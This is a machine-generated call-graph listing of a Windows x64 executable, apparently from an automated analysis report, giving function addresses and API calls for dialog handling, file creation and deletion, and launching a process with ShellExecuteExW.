7ff6c16c2f58 56 API calls 26632->26634 26634->26487 26634->26492 26634->26495 26634->26496 26634->26498 26634->26500 26634->26503 26634->26504 26634->26508 26634->26509 26634->26513 26634->26518 26634->26519 26634->26524 26634->26528 26634->26529 26634->26530 26634->26535 26634->26537 26634->26538 26634->26540 26634->26543 26634->26548 26634->26549 26634->26555 26634->26559 26634->26565 26634->26566 26634->26567 26634->26572 26634->26574 26634->26585 26634->26588 26634->26590 26634->26591 26634->26599 26634->26603 26634->26606 26634->26607 26634->26610 26634->26613 26634->26620 26634->26622 26634->26623 26634->26625 26634->26627 26634->26631 26634->26632 27129 7ff6c16d13c4 CompareStringW 26634->27129 27130 7ff6c16da440 26634->27130 27206 7ff6c16ccfa4 35 API calls _invalid_parameter_noinfo_noreturn 26634->27206 27207 7ff6c16d95b4 33 API calls Concurrency::cancel_current_task 26634->27207 27208 7ff6c16e0684 31 API calls _invalid_parameter_noinfo_noreturn 26634->27208 27209 7ff6c16bdf4c 47 API calls memcpy_s 26634->27209 27210 7ff6c16da834 33 API calls _invalid_parameter_noinfo_noreturn 26634->27210 27211 7ff6c16d9518 33 API calls 26634->27211 27212 7ff6c16dabe8 33 API calls 3 library calls 26634->27212 27213 7ff6c16c7368 33 API calls 2 library calls 26634->27213 27214 7ff6c16c4088 33 API calls 26634->27214 27215 7ff6c16c65b0 33 API calls 3 library calls 26634->27215 27216 7ff6c16c72cc 26634->27216 27220 7ff6c16c31bc 26634->27220 27234 7ff6c16c3ea0 FindClose 26634->27234 27235 7ff6c16d13f4 CompareStringW 26634->27235 27236 7ff6c16d9cd0 47 API calls 26634->27236 27237 7ff6c16d87d8 51 API calls 3 library calls 26634->27237 27238 7ff6c16dab54 33 API calls _handle_error 26634->27238 27239 7ff6c16c7df4 26634->27239 27247 7ff6c16c5b08 CompareStringW 26634->27247 27248 7ff6c16c7eb0 47 API calls 26634->27248 26636 7ff6c16df9a3 26635->26636 26637 7ff6c16b20b0 33 API calls 26636->26637 26639 7ff6c16df9b9 26637->26639 26638 7ff6c16df9ee 27276 7ff6c16be34c 26638->27276 26639->26638 26640 7ff6c16b20b0 33 API calls 26639->26640 26640->26638 26642 7ff6c16dfa4b 27296 7ff6c16be7a8 26642->27296 26646 7ff6c16dfa61 26647 7ff6c16e2320 _handle_error 8 API calls 26646->26647 26648 7ff6c16dbc52 26647->26648 26648->26272 28403 7ff6c16d849c 26650->28403 26653 7ff6c16df4b7 26655 7ff6c16e2320 _handle_error 8 API calls 26653->26655 26654 7ff6c16df3c7 GetWindow 26659 7ff6c16df3e2 26654->26659 26656 7ff6c16dbe9b 26655->26656 26656->26032 26656->26033 26657 7ff6c16df3ee GetClassNameW 28408 7ff6c16d13c4 CompareStringW 26657->28408 26659->26653 26659->26657 26660 7ff6c16df417 GetWindowLongPtrW 26659->26660 26661 7ff6c16df496 GetWindow 26659->26661 26660->26661 26662 7ff6c16df429 IsDlgButtonChecked 26660->26662 26661->26653 26661->26659 26662->26661 26663 7ff6c16df445 GetObjectW 26662->26663 28409 7ff6c16d8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26663->28409 26665 7ff6c16df461 28410 7ff6c16d84cc 26665->28410 28414 7ff6c16d8df4 16 API calls _handle_error 26665->28414 26668 7ff6c16df479 IsDlgButtonChecked DeleteObject 26668->26661 26670 7ff6c16c6300 26669->26670 26676 7ff6c16c638d 26669->26676 26671 7ff6c16b13a4 33 API calls 26670->26671 26672 7ff6c16c631b GetCurrentDirectoryW 26671->26672 26673 7ff6c16c6341 26672->26673 26674 7ff6c16b20b0 33 API calls 26673->26674 26675 7ff6c16c634f 26674->26675 26675->26676 26677 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26675->26677 26676->26049 26678 7ff6c16c63a9 26677->26678 26680 7ff6c16b2527 26679->26680 26681 7ff6c16b252a SetDlgItemTextW 26679->26681 26680->26681 26682 7ff6c171e2e0 26681->26682 26683->26056 26685 7ff6c16b2513 26684->26685 26686 7ff6c16b2516 SetDlgItemTextW 26684->26686 26685->26686 26688 7ff6c16b12d0 26687->26688 26694 7ff6c16b139b 26687->26694 26689 7ff6c16b12de memcpy_s 26688->26689 26692 7ff6c16b1396 26688->26692 26695 7ff6c16b1338 26688->26695 26689->26093 28417 7ff6c16b1f80 33 API calls 3 library calls 26692->28417 28418 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26694->28418 26695->26689 26696 7ff6c16e21d0 33 API calls 26695->26696 26696->26689 26697->26120 26699 7ff6c16c32bc 51 API calls 26698->26699 26700 7ff6c16c32b1 26699->26700 26700->26133 26700->26157 26701->26133 26703 7ff6c16b13a4 33 API calls 26702->26703 26704 7ff6c16c6489 26703->26704 26705 7ff6c16c648c GetModuleFileNameW 26704->26705 26708 7ff6c16c64dc 26704->26708 26706 7ff6c16c64de 26705->26706 26707 7ff6c16c64a7 26705->26707 26706->26708 26707->26704 26709 7ff6c16b129c 33 API calls 26708->26709 26711 7ff6c16c6506 26709->26711 26710 7ff6c16c653e 26710->26199 26711->26710 26712 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26711->26712 26713 7ff6c16c6560 26712->26713 26714->26214 26716 7ff6c16b20f6 26715->26716 26718 7ff6c16b20cb memcpy_s 26715->26718 28419 7ff6c16b1474 33 API calls 3 library calls 26716->28419 26718->26234 26719->26246 26720->26257 26721->26266 26722->26270 26723->26279 26725 7ff6c16e3620 26724->26725 26725->26282 26726->26196 26728 7ff6c16b1177 26727->26728 26729 7ff6c16b2034 33 API calls 26728->26729 26730 7ff6c16b1185 memcpy_s 26729->26730 26730->26211 26732 7ff6c16b2085 26731->26732 26734 7ff6c16b2059 memcpy_s 26731->26734 28420 7ff6c16b15b8 33 API calls 3 library calls 26732->28420 26734->26185 26736 7ff6c16e2329 26735->26736 26737 7ff6c16dc350 26736->26737 26738 7ff6c16e2550 IsProcessorFeaturePresent 26736->26738 26739 7ff6c16e2568 26738->26739 28421 7ff6c16e2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26739->28421 26741 7ff6c16e257b 28422 7ff6c16e2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26741->28422 28423 7ff6c16e783c 31 API calls 3 library calls 26744->28423 26746 7ff6c16e791d 28424 7ff6c16e7934 16 API calls abort 26746->28424 26749->26240 26750->26304 26751->26329 26752->26344 26753->26356 26779 7ff6c16c3e28 26754->26779 26758 7ff6c16ca589 26785 7ff6c16c9408 26758->26785 26761 7ff6c16ca6f2 GetSystemMetrics GetWindow 26763 7ff6c16ca821 26761->26763 26778 7ff6c16ca71d 26761->26778 26762 7ff6c16ca603 26764 7ff6c16ca6c2 26762->26764 26765 7ff6c16ca60c GetWindowLongPtrW 26762->26765 26767 7ff6c16e2320 _handle_error 8 API calls 26763->26767 26804 7ff6c16c95a8 26764->26804 26768 7ff6c171e2c0 26765->26768 26766 7ff6c16ca519 26766->26758 26776 7ff6c16ca56a SetDlgItemTextW 26766->26776 26800 7ff6c16c9800 26766->26800 26771 7ff6c16ca830 26767->26771 26772 7ff6c16ca6aa GetWindowRect 26768->26772 26771->26369 26772->26764 26774 7ff6c16ca73e GetWindowRect 26774->26778 26775 7ff6c16ca6e5 SetDlgItemTextW 26775->26761 26776->26766 26777 7ff6c16ca800 GetWindow 26777->26763 26777->26778 26778->26763 26778->26774 26778->26777 26780 7ff6c16c3e4d _snwprintf 26779->26780 26813 7ff6c16e9ef0 26780->26813 26783 7ff6c16d0f68 WideCharToMultiByte 26784 7ff6c16d0faa 26783->26784 26784->26766 26786 7ff6c16c95a8 47 API calls 26785->26786 26789 7ff6c16c944f 26786->26789 26787 7ff6c16e2320 _handle_error 8 API calls 26788 7ff6c16c958e GetWindowRect GetClientRect 26787->26788 26788->26761 26788->26762 26790 7ff6c16b129c 33 API calls 26789->26790 26798 7ff6c16c955a 26789->26798 26791 7ff6c16c949c 26790->26791 26792 7ff6c16c95a1 26791->26792 26794 7ff6c16b129c 33 API calls 26791->26794 26793 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26792->26793 26795 7ff6c16c95a7 26793->26795 26796 7ff6c16c9514 26794->26796 26797 7ff6c16c959c 26796->26797 26796->26798 26799 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26797->26799 26798->26787 26799->26792 26801 7ff6c16c9840 26800->26801 26803 7ff6c16c9869 26800->26803 26852 7ff6c16ea270 31 API calls 2 library calls 26801->26852 26803->26766 26805 7ff6c16c3e28 swprintf 46 API calls 26804->26805 26806 7ff6c16c95eb 26805->26806 26807 7ff6c16d0f68 WideCharToMultiByte 26806->26807 26808 7ff6c16c9603 26807->26808 26809 7ff6c16c9800 31 API calls 26808->26809 26810 7ff6c16c961b 26809->26810 26811 7ff6c16e2320 _handle_error 8 API calls 26810->26811 26812 7ff6c16c962b 26811->26812 26812->26761 26812->26775 26814 7ff6c16e9f36 26813->26814 26816 7ff6c16e9f4e 26813->26816 26840 7ff6c16ed69c 15 API calls abort 26814->26840 26816->26814 26817 7ff6c16e9f58 26816->26817 26842 7ff6c16e7ef0 35 API calls 2 library calls 26817->26842 26818 7ff6c16e9f3b 26841 7ff6c16e78e4 31 API calls _invalid_parameter_noinfo 26818->26841 26821 7ff6c16e9f69 memcpy_s 26843 7ff6c16e7e70 15 API calls memcpy_s 26821->26843 26822 7ff6c16e2320 _handle_error 8 API calls 26823 7ff6c16c3e69 26822->26823 26823->26783 26825 7ff6c16e9fd4 26844 7ff6c16e82f8 46 API calls 3 library calls 26825->26844 26827 7ff6c16e9fdd 26828 7ff6c16ea014 26827->26828 26829 7ff6c16e9fe5 26827->26829 26831 7ff6c16ea06c 26828->26831 26832 7ff6c16ea092 26828->26832 26833 7ff6c16ea023 26828->26833 26835 7ff6c16ea01a 26828->26835 26845 7ff6c16ed90c 26829->26845 26836 7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26831->26836 26832->26831 26837 7ff6c16ea09c 26832->26837 26834 7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26833->26834 26839 7ff6c16e9f46 26834->26839 26835->26831 26835->26833 26836->26839 26838 7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26837->26838 26838->26839 26839->26822 26840->26818 26841->26839 26842->26821 26843->26825 26844->26827 26846 7ff6c16ed911 RtlRestoreThreadPreferredUILanguages 26845->26846 26847 7ff6c16ed941 Concurrency::details::SchedulerProxy::DeleteThis 26845->26847 26846->26847 26848 7ff6c16ed92c 26846->26848 26847->26839 26851 7ff6c16ed69c 15 API calls abort 26848->26851 26850 7ff6c16ed931 GetLastError 26850->26847 26851->26850 26852->26803 26865 7ff6c16b13a4 26853->26865 26856 7ff6c16b2494 26857 7ff6c16b129c 33 API calls 26856->26857 26858 7ff6c16b24a2 26857->26858 26859 7ff6c16b24dd 26858->26859 26862 7ff6c16b2505 26858->26862 26860 7ff6c16e2320 _handle_error 8 API calls 26859->26860 26861 7ff6c16b24f3 26860->26861 26861->26378 26863 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26862->26863 26864 7ff6c16b250a 26863->26864 26866 7ff6c16b13ad 26865->26866 26874 7ff6c16b142d GetWindowTextW 26865->26874 26867 7ff6c16b13ce 26866->26867 26868 7ff6c16b143d 26866->26868 26872 7ff6c16b13db memcpy_s 26867->26872 26875 7ff6c16e21d0 26867->26875 26885 7ff6c16b2018 33 API calls std::_Xinvalid_argument 26868->26885 26884 7ff6c16b197c 31 API calls _invalid_parameter_noinfo_noreturn 26872->26884 26874->26856 26877 7ff6c16e21db 26875->26877 26876 7ff6c16e21f4 26876->26872 26877->26876 26879 7ff6c16e21fa 26877->26879 26886 7ff6c16ebbc0 26877->26886 26880 7ff6c16e2205 26879->26880 26889 7ff6c16e2f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26879->26889 26890 7ff6c16b1f80 33 API calls 3 library calls 26880->26890 26883 7ff6c16e220b 26884->26874 26891 7ff6c16ebc00 26886->26891 26889->26880 26890->26883 26896 7ff6c16ef398 EnterCriticalSection 26891->26896 26897->26395 26899->26403 26907 7ff6c16c9638 26900->26907 26903 7ff6c16c97d9 26905 7ff6c16e2320 _handle_error 8 API calls 26903->26905 26904 7ff6c16c9800 31 API calls 26904->26903 26906 7ff6c16c97f2 26905->26906 26906->26415 26906->26416 26908 7ff6c16c9692 26907->26908 26916 7ff6c16c9730 26907->26916 26909 7ff6c16d0f68 WideCharToMultiByte 26908->26909 26911 7ff6c16c96c0 26908->26911 26909->26911 26910 7ff6c16e2320 _handle_error 8 API calls 26912 7ff6c16c9764 26910->26912 26913 7ff6c16c96ef 26911->26913 26917 7ff6c16caa88 45 API calls _snwprintf 26911->26917 26912->26903 26912->26904 26918 7ff6c16ea270 31 API calls 2 library calls 26913->26918 26916->26910 26917->26913 26918->26916 26935 7ff6c16cd4d0 26919->26935 26923 7ff6c16cd8e5 _snwprintf 26924 7ff6c16e9ef0 swprintf 46 API calls 26923->26924 26932 7ff6c16cd974 26923->26932 26949 7ff6c16b9d78 33 API calls 26923->26949 26924->26923 26925 7ff6c16cd9a3 26927 7ff6c16cda17 26925->26927 26929 7ff6c16cda3f 26925->26929 26928 7ff6c16e2320 _handle_error 8 API calls 26927->26928 26930 7ff6c16cda2b 26928->26930 26931 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26929->26931 26930->26421 26933 7ff6c16cda44 26931->26933 26932->26925 26950 7ff6c16b9d78 33 API calls 26932->26950 26936 7ff6c16cd665 26935->26936 26938 7ff6c16cd502 26935->26938 26939 7ff6c16ccb80 26936->26939 26937 7ff6c16b1744 33 API calls 26937->26938 26938->26936 26938->26937 26941 7ff6c16ccbb6 26939->26941 26946 7ff6c16ccc80 26939->26946 26943 7ff6c16ccc20 26941->26943 26944 7ff6c16ccc7b 26941->26944 26947 7ff6c16ccbc6 26941->26947 26943->26947 26948 7ff6c16e21d0 33 API calls 26943->26948 26951 7ff6c16b1f80 33 API calls 3 library calls 26944->26951 26952 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26946->26952 26947->26923 26948->26947 26949->26923 26950->26925 26951->26946 26954 7ff6c16dae80 GetDlgItem 26953->26954 26955 7ff6c16dae3c GetMessageW 26953->26955 26954->26424 26954->26425 26956 7ff6c16dae5b IsDialogMessageW 26955->26956 26957 7ff6c16dae6a TranslateMessage DispatchMessageW 26955->26957 26956->26954 26956->26957 26957->26954 26960 7ff6c16c36b3 26958->26960 26959 7ff6c16c36e0 26978 7ff6c16c32bc 26959->26978 26960->26959 26961 7ff6c16c36cc CreateDirectoryW 26960->26961 26961->26959 26963 7ff6c16c377d 26961->26963 26965 7ff6c16c378d 26963->26965 27065 7ff6c16c3d34 26963->27065 26969 7ff6c16e2320 _handle_error 8 API calls 26965->26969 26966 7ff6c16c3791 GetLastError 26966->26965 26971 7ff6c16c37b9 26969->26971 26971->26442 26972 7ff6c16c3720 CreateDirectoryW 26973 7ff6c16c373b 26972->26973 26974 7ff6c16c3774 26973->26974 26975 7ff6c16c37ce 26973->26975 26974->26963 26974->26966 26976 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26975->26976 26977 7ff6c16c37d3 26976->26977 26979 7ff6c16c32e4 26978->26979 26980 7ff6c16c32e7 GetFileAttributesW 26978->26980 26979->26980 26981 7ff6c16c32f8 26980->26981 26982 7ff6c16c3375 26980->26982 26984 7ff6c16c6a0c 49 API calls 26981->26984 26983 7ff6c16e2320 _handle_error 8 API calls 26982->26983 26985 7ff6c16c3389 26983->26985 26986 7ff6c16c331f 26984->26986 26985->26966 26992 7ff6c16c6a0c 26985->26992 26987 7ff6c16c3323 GetFileAttributesW 26986->26987 26988 7ff6c16c333c 26986->26988 26987->26988 26988->26982 26989 7ff6c16c3399 26988->26989 26990 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26989->26990 26991 7ff6c16c339e 26990->26991 26993 7ff6c16c6a4b 26992->26993 27012 7ff6c16c6a44 26992->27012 26995 7ff6c16b129c 33 API calls 26993->26995 26994 7ff6c16e2320 _handle_error 8 API calls 26996 7ff6c16c371c 26994->26996 26997 7ff6c16c6a76 26995->26997 26996->26972 26996->26973 26998 7ff6c16c6cc7 26997->26998 26999 7ff6c16c6a96 26997->26999 27000 7ff6c16c62dc 35 API calls 26998->27000 27001 7ff6c16c6ab0 26999->27001 27007 7ff6c16c6b49 26999->27007 27003 7ff6c16c6ce6 27000->27003 27029 7ff6c16c70ab 27001->27029 27079 7ff6c16bc098 33 API calls 2 library calls 27001->27079 27004 7ff6c16c6eef 27003->27004 27005 7ff6c16c6b44 27003->27005 27009 7ff6c16c6d1b 27003->27009 27048 7ff6c16c70cf 27004->27048 27096 7ff6c16bc098 33 API calls 2 library calls 27004->27096 27006 7ff6c16c70b1 27005->27006 27010 7ff6c16c70d5 27005->27010 27005->27012 27017 7ff6c16c70a6 27005->27017 27015 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27006->27015 27007->27005 27030 7ff6c16b129c 33 API calls 27007->27030 27039 7ff6c16c70bd 27009->27039 27082 7ff6c16bc098 33 API calls 2 library calls 27009->27082 27016 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27010->27016 27012->26994 27013 7ff6c16c6b03 27018 7ff6c16c6b15 memcpy_s 27013->27018 27024 7ff6c16b1fa0 31 API calls 27013->27024 27022 7ff6c16c70b7 27015->27022 27023 7ff6c16c70db 27016->27023 27028 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27017->27028 27027 7ff6c16b1fa0 31 API calls 27018->27027 27019 7ff6c16c6f56 27097 7ff6c16b11cc 33 API calls memcpy_s 27019->27097 27032 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27022->27032 27034 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27023->27034 27024->27018 27026 7ff6c16c70c3 27037 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27026->27037 27027->27005 27028->27029 27099 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27029->27099 27035 7ff6c16c6bbe 27030->27035 27031 7ff6c16c6f69 27098 7ff6c16c57ac 33 API calls memcpy_s 27031->27098 27032->27039 27033 7ff6c16b1fa0 31 API calls 27050 7ff6c16c6df5 27033->27050 27040 7ff6c16c70e1 27034->27040 27080 7ff6c16c5820 33 API calls 27035->27080 27042 7ff6c16c70c9 27037->27042 27038 7ff6c16c6d76 memcpy_s 27038->27026 27038->27033 27100 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27039->27100 27101 7ff6c16b704c 47 API calls memcpy_s 27042->27101 27043 7ff6c16c6bd3 27081 7ff6c16be164 33 API calls 2 library calls 27043->27081 27045 7ff6c16b1fa0 31 API calls 27049 7ff6c16c6fec 27045->27049 27047 7ff6c16c6f79 memcpy_s 27047->27023 27047->27045 27102 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27048->27102 27051 7ff6c16b1fa0 31 API calls 27049->27051 27055 7ff6c16c6e21 27050->27055 27083 7ff6c16b1744 27050->27083 27054 7ff6c16c6ff6 27051->27054 27053 7ff6c16b1fa0 31 API calls 27058 7ff6c16c6c6d 27053->27058 27059 7ff6c16b1fa0 31 API calls 27054->27059 27055->27042 27056 7ff6c16b129c 33 API calls 27055->27056 27060 7ff6c16c6ec2 27056->27060 27057 7ff6c16c6be9 memcpy_s 27057->27022 27057->27053 27061 7ff6c16b1fa0 31 API calls 27058->27061 27059->27005 27062 7ff6c16b2034 33 API calls 27060->27062 27061->27005 27063 7ff6c16c6edf 27062->27063 27064 7ff6c16b1fa0 31 API calls 27063->27064 27064->27005 27066 7ff6c16c3d5e SetFileAttributesW 27065->27066 27067 7ff6c16c3d5b 27065->27067 27068 7ff6c16c3d74 27066->27068 27069 7ff6c16c3df5 27066->27069 27067->27066 27071 7ff6c16c6a0c 49 API calls 27068->27071 27070 7ff6c16e2320 _handle_error 8 API calls 27069->27070 27072 7ff6c16c3e0a 27070->27072 27073 7ff6c16c3d99 27071->27073 27072->26965 27074 7ff6c16c3d9d SetFileAttributesW 27073->27074 27075 7ff6c16c3dbc 27073->27075 27074->27075 27075->27069 27076 7ff6c16c3e1a 27075->27076 27077 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27076->27077 27078 7ff6c16c3e1f 27077->27078 27079->27013 27080->27043 27081->27057 27082->27038 27084 7ff6c16b18a1 27083->27084 27087 7ff6c16b1784 27083->27087 27103 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27084->27103 27086 7ff6c16b18a7 27104 7ff6c16b1f80 33 API calls 3 library calls 27086->27104 27087->27086 27090 7ff6c16e21d0 33 API calls 27087->27090 27094 7ff6c16b17ac memcpy_s 27087->27094 27089 7ff6c16b18ad 27105 7ff6c16e354c 31 API calls __std_exception_copy 27089->27105 27090->27094 27092 7ff6c16b18d9 27092->27055 27093 7ff6c16b1859 memcpy_s 27093->27055 27094->27093 27095 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27094->27095 27095->27084 27096->27019 27097->27031 27098->27047 27101->27048 27104->27089 27105->27092 27107 7ff6c16b7206 27106->27107 27108 7ff6c16b713b 27106->27108 27116 7ff6c16b704c 47 API calls memcpy_s 27107->27116 27114 7ff6c16b714b memcpy_s 27108->27114 27115 7ff6c16b3f48 33 API calls 2 library calls 27108->27115 27111 7ff6c16b720b 27112 7ff6c16b7273 27111->27112 27117 7ff6c16b889c 8 API calls memcpy_s 27111->27117 27112->26459 27114->26459 27115->27114 27116->27111 27117->27111 27119 7ff6c16c2102 27118->27119 27120 7ff6c16c20ea 27118->27120 27121 7ff6c16c2126 27119->27121 27124 7ff6c16bb544 99 API calls 27119->27124 27120->27119 27122 7ff6c16c20f6 FindCloseChangeNotification 27120->27122 27121->26483 27122->27119 27124->27121 27126 7ff6c16daa2f 27125->27126 27127 7ff6c16daa36 27125->27127 27126->26634 27127->27126 27128 7ff6c16b1744 33 API calls 27127->27128 27128->27127 27129->26634 27131 7ff6c16da47f 27130->27131 27152 7ff6c16da706 27130->27152 27264 7ff6c16dcdf8 33 API calls 27131->27264 27133 7ff6c16e2320 _handle_error 8 API calls 27135 7ff6c16da717 27133->27135 27134 7ff6c16da49e 27136 7ff6c16b129c 33 API calls 27134->27136 27135->26571 27137 7ff6c16da4de 27136->27137 27138 7ff6c16b129c 33 API calls 27137->27138 27139 7ff6c16da517 27138->27139 27140 7ff6c16b129c 33 API calls 27139->27140 27141 7ff6c16da54a 27140->27141 27265 7ff6c16da834 33 API calls _invalid_parameter_noinfo_noreturn 27141->27265 27143 7ff6c16da573 27145 7ff6c16da73a 27143->27145 27147 7ff6c16da740 27143->27147 27148 7ff6c16b20b0 33 API calls 27143->27148 27151 7ff6c16da685 27143->27151 27157 7ff6c16da734 27143->27157 27144 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27144->27145 27146 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27145->27146 27146->27147 27149 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27147->27149 27148->27151 27150 7ff6c16da746 27149->27150 27154 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27150->27154 27151->27150 27151->27152 27153 7ff6c16da72f 27151->27153 27152->27133 27155 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27153->27155 27156 7ff6c16da74c 27154->27156 27155->27157 27158 7ff6c16b255c 61 API calls 27156->27158 27157->27144 27159 7ff6c16da795 27158->27159 27160 7ff6c16da7b1 27159->27160 27161 7ff6c16da801 SetDlgItemTextW 27159->27161 27165 7ff6c16da7a1 27159->27165 27162 7ff6c16e2320 _handle_error 8 API calls 27160->27162 27161->27160 27163 7ff6c16da827 27162->27163 27163->26571 27164 7ff6c16da7ad 27164->27160 27166 7ff6c16da7b7 EndDialog 27164->27166 27165->27160 27165->27164 27266 7ff6c16cbb00 102 API calls 27165->27266 27166->27160 27173 7ff6c16df529 memcpy_s 27168->27173 27186 7ff6c16df87d 27168->27186 27169 7ff6c16b1fa0 31 API calls 27170 7ff6c16df89c 27169->27170 27171 7ff6c16e2320 _handle_error 8 API calls 27170->27171 27172 7ff6c16df8a8 27171->27172 27172->26575 27174 7ff6c16df684 27173->27174 27267 7ff6c16d13c4 CompareStringW 27173->27267 27176 7ff6c16b129c 33 API calls 27174->27176 27177 7ff6c16df6c0 27176->27177 27178 7ff6c16c32a8 51 API calls 27177->27178 27179 7ff6c16df6ca 27178->27179 27180 7ff6c16b1fa0 31 API calls 27179->27180 27183 7ff6c16df6d5 27180->27183 27181 7ff6c16df742 ShellExecuteExW 27182 7ff6c16df846 27181->27182 27188 7ff6c16df755 27181->27188 27182->27186 27190 7ff6c16df8fb 27182->27190 27183->27181 27185 7ff6c16b129c 33 API calls 27183->27185 27184 7ff6c16df78e 27269 7ff6c16dfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27184->27269 27189 7ff6c16df717 27185->27189 27186->27169 27187 7ff6c16df7e3 CloseHandle 27191 7ff6c16df7f2 27187->27191 27199 7ff6c16df801 27187->27199 27188->27184 27188->27187 27196 7ff6c16df781 ShowWindow 27188->27196 27268 7ff6c16c5b60 53 API calls 2 library calls 27189->27268 27193 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27190->27193 27270 7ff6c16d13c4 CompareStringW 27191->27270 27194 7ff6c16df900 27193->27194 27196->27184 27198 7ff6c16df725 27201 7ff6c16b1fa0 31 API calls 27198->27201 27199->27182 27202 7ff6c16df837 ShowWindow 27199->27202 27200 7ff6c16df7a6 27200->27187 27204 7ff6c16df7b4 GetExitCodeProcess 27200->27204 27203 7ff6c16df72f 27201->27203 27202->27182 27203->27181 27204->27187 27205 7ff6c16df7c7 27204->27205 27205->27187 27206->26634 27207->26634 27208->26634 27209->26634 27210->26634 27211->26634 27212->26634 27213->26634 27214->26634 27215->26634 27217 7ff6c16c72ea 27216->27217 27271 7ff6c16bb3a8 27217->27271 27221 7ff6c16c31e4 27220->27221 27222 7ff6c16c31e7 DeleteFileW 27220->27222 27221->27222 27223 7ff6c16c31fd 27222->27223 27231 7ff6c16c327c 27222->27231 27225 7ff6c16c6a0c 49 API calls 27223->27225 27224 7ff6c16e2320 _handle_error 8 API calls 27226 7ff6c16c3291 27224->27226 27227 7ff6c16c3222 27225->27227 27226->26634 27228 7ff6c16c3243 27227->27228 27229 7ff6c16c3226 DeleteFileW 27227->27229 27230 7ff6c16c32a1 27228->27230 27228->27231 27229->27228 27232 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27230->27232 27231->27224 27233 7ff6c16c32a6 27232->27233 27235->26634 27236->26634 27237->26634 27238->26634 27240 7ff6c16c7e0c 27239->27240 27241 7ff6c16c7e55 27240->27241 27242 7ff6c16c7e23 27240->27242 27275 7ff6c16b704c 47 API calls memcpy_s 27241->27275 27244 7ff6c16b129c 33 API calls 27242->27244 27246 7ff6c16c7e47 27244->27246 27245 7ff6c16c7e5a 27246->26634 27247->26634 27248->26634 27251 7ff6c16cd25e 27249->27251 27250 7ff6c16cd292 27250->26621 27251->27250 27252 7ff6c16b1744 33 API calls 27251->27252 27252->27251 27253->26523 27254->26512 27256->26492 27257->26495 27258->26498 27259->26552 27260->26541 27262->26547 27264->27134 27265->27143 27266->27164 27267->27174 27268->27198 27269->27200 27270->27199 27274 7ff6c16bb3f2 memcpy_s 27271->27274 27272 7ff6c16e2320 _handle_error 8 API calls 27273 7ff6c16bb4b6 27272->27273 27273->26634 27274->27272 27275->27245 27332 7ff6c16c86ec 27276->27332 27278 7ff6c16be3c4 27338 7ff6c16be600 27278->27338 27280 7ff6c16be4d4 27283 7ff6c16e21d0 33 API calls 27280->27283 27281 7ff6c16be549 27284 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27281->27284 27282 7ff6c16be454 27282->27280 27282->27281 27285 7ff6c16be4f0 27283->27285 27286 7ff6c16be54e 27284->27286 27344 7ff6c16d3148 102 API calls 27285->27344 27289 7ff6c16c190d 27286->27289 27291 7ff6c16c18c2 27286->27291 27293 7ff6c16b1fa0 31 API calls 27286->27293 27288 7ff6c16be51d 27290 7ff6c16e2320 _handle_error 8 API calls 27288->27290 27289->26642 27292 7ff6c16be52d 27290->27292 27291->27289 27294 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27291->27294 27292->26642 27293->27286 27295 7ff6c16c193b 27294->27295 27299 7ff6c16be7ea 27296->27299 27297 7ff6c16be864 27300 7ff6c16be993 27297->27300 27302 7ff6c16be8a1 27297->27302 27299->27297 27299->27302 27345 7ff6c16c3ec8 27299->27345 27303 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27300->27303 27301 7ff6c16be900 27308 7ff6c16be955 27301->27308 27388 7ff6c16b28a4 82 API calls 2 library calls 27301->27388 27302->27301 27352 7ff6c16bf578 27302->27352 27305 7ff6c16be998 27303->27305 27304 7ff6c16e2320 _handle_error 8 API calls 27307 7ff6c16be97e 27304->27307 27310 7ff6c16be578 27307->27310 27308->27304 28389 7ff6c16c15d8 27310->28389 27313 7ff6c16be59e 27315 7ff6c16b1fa0 31 API calls 27313->27315 27314 7ff6c16d1870 108 API calls 27314->27313 27316 7ff6c16be5b7 27315->27316 27317 7ff6c16b1fa0 31 API calls 27316->27317 27318 7ff6c16be5c3 27317->27318 27319 7ff6c16b1fa0 31 API calls 27318->27319 27320 7ff6c16be5cf 27319->27320 27321 7ff6c16c878c 108 API 